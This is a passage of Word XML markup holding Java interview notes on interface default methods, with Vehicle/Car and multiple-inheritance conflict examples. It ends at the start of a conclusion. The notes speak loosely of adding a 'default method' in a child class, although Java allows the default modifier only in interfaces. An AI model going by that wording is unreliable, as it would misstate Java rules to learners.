    <w:p w14:paraId="3F65CC80"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F632A1C"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A534551" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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479729C3" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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fault methods in Java allow you to provide method implementations within interfaces, facilitating backward compatibility, code reuse, and resolving issues with multiple inheritance. They make interfaces more flexible and adaptable without breaking the existing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125768CC" w14:textId="77CC18B4"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83AEE13">
          <v:rect id="_x0000_i1219" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E48C90" w14:textId="35174E60" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc196307554"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can I add one more new default method in my child class? Does it give any problems with my existing classes</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="4F402F73" w14:textId="14BDC807" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">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es, you can add a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but whether it creates problems depends on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>context</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which it is done and how the class hierarchy is structured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6924DE"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 are a few key points to consider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B84D8A" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6"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Adding a Default Method in the Child Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71836865"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you add a new default method in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it will be treated as a regular method within the child class and won't directly impact the parent class or its existing implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948CC8C"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DBF964"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Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB45B3"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drive();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ADABBD" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA21E9E"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Default method in the interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627D6CA3"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efault void honk() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD8FDF"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Vehicle honking");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03450BA6"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ADC842D"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8C7590C" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AFF062"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Car implements Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A5A3DC"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378C1AF8"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drive() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F37317"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ar is driving");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92E869"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0EAE0AE" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBA5990"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You can add a new default method in the child class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510AC7CC"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openSunroof() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FB8D3"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Opening sunroof");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8236B6"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D79EFEF"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9F67B90" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEF380D"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77462469"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58EFBA3E"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ehicle myCar = new Car();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8BE27"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Car.honk(); // Output: Vehicle honking (default implementation in Vehicle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5333D202"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60C69AD"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53EC83F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7494EDC7" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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Car class does not affect the existing default method honk() from the Vehicle interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072E3C8" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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You can add new methods (like openSunroof()) in the Car class, and they won't interfere with any existing classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22992622" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6"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Adding or Overriding Default Methods in the Child Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68589BD9" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent class</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interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> already has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>override</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide your own implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5FC833" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduces a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not already in the parent class or interface), there is no direct issue with existing classes. Existing classes that inherit from the parent class/interface will not be affected, as they will not automatically inherit the new method unless they explicitly implement it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37900360" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6"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What Happens If You Add a New Default Method to the Parent Interface?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE5238"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you add a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new default method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an existing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is already implemented by some classes), it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>will not break the existing classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because those classes will automatically inherit the default method unless they override it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E04E7BE"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B1CBF"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Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCA921F"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drive();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095474B9" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080E9F4C"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Existing default method in Vehicle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3401E207"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efault void honk() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474901F5"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Vehicle honking");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCDE8E"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252E385" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70EF61C5"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New default method added later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86B788"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efault void startEngine() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BA4B7"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Vehicle engine started");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442ABED2"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6E75CED"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4E4B362" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C294CA"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Car implements Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D2C939"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5C7E6041"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drive() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773F8191"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ar is driving");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A7D5A"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C87D244"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19A5C1C" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CC7D1A"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34E853F8"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4FEA1EF2"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ehicle myCar = new Car();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1F930"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Car.honk(); // Output: Vehicle honking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB18705"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Car.startEngine(); // Output: Vehicle engine started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E95A9D3"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EA0E9C8"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E35673C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C650E0" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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the new method startEngine() is added to the Vehicle interface, it doesn't break the Car class implementation, as it automatically inherits the new default method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00196065" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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owever, if the Car class already had a custom implementation for startEngine(), it would override the default method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893ACF3" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6"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Potential Issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045ED135"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potential issue arises when you add a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default method in multiple interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a class implements those interfaces, leading to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conflict</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C80B9"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example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3301F6"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A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF2285"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efault void show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733C0E39"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A's show");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA8C9A"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3F0DF5D"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AB5D072" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0A8134"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interface B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B6EEC"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efault void show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB3512"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B's show");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1FA524"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B0F395D"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2184BBF" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591EC99C"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C implements A, B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D293CBE"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You must override the conflicting default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BFB0D"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20AAD3C7"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show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548B39A8"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s show");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2FD3FE"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1E4C20A"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FF4E2C2" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AC0040"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61924D92"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44B6CE54"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 c = new C();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34164E39"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show();  // Output: C's show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C3B526"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D0967D8"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CE198AB" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA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ere, both interfaces A and B have a default method show(), and C has to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolve the conflict</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by overriding the method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AAB1BC" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10715C6E" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
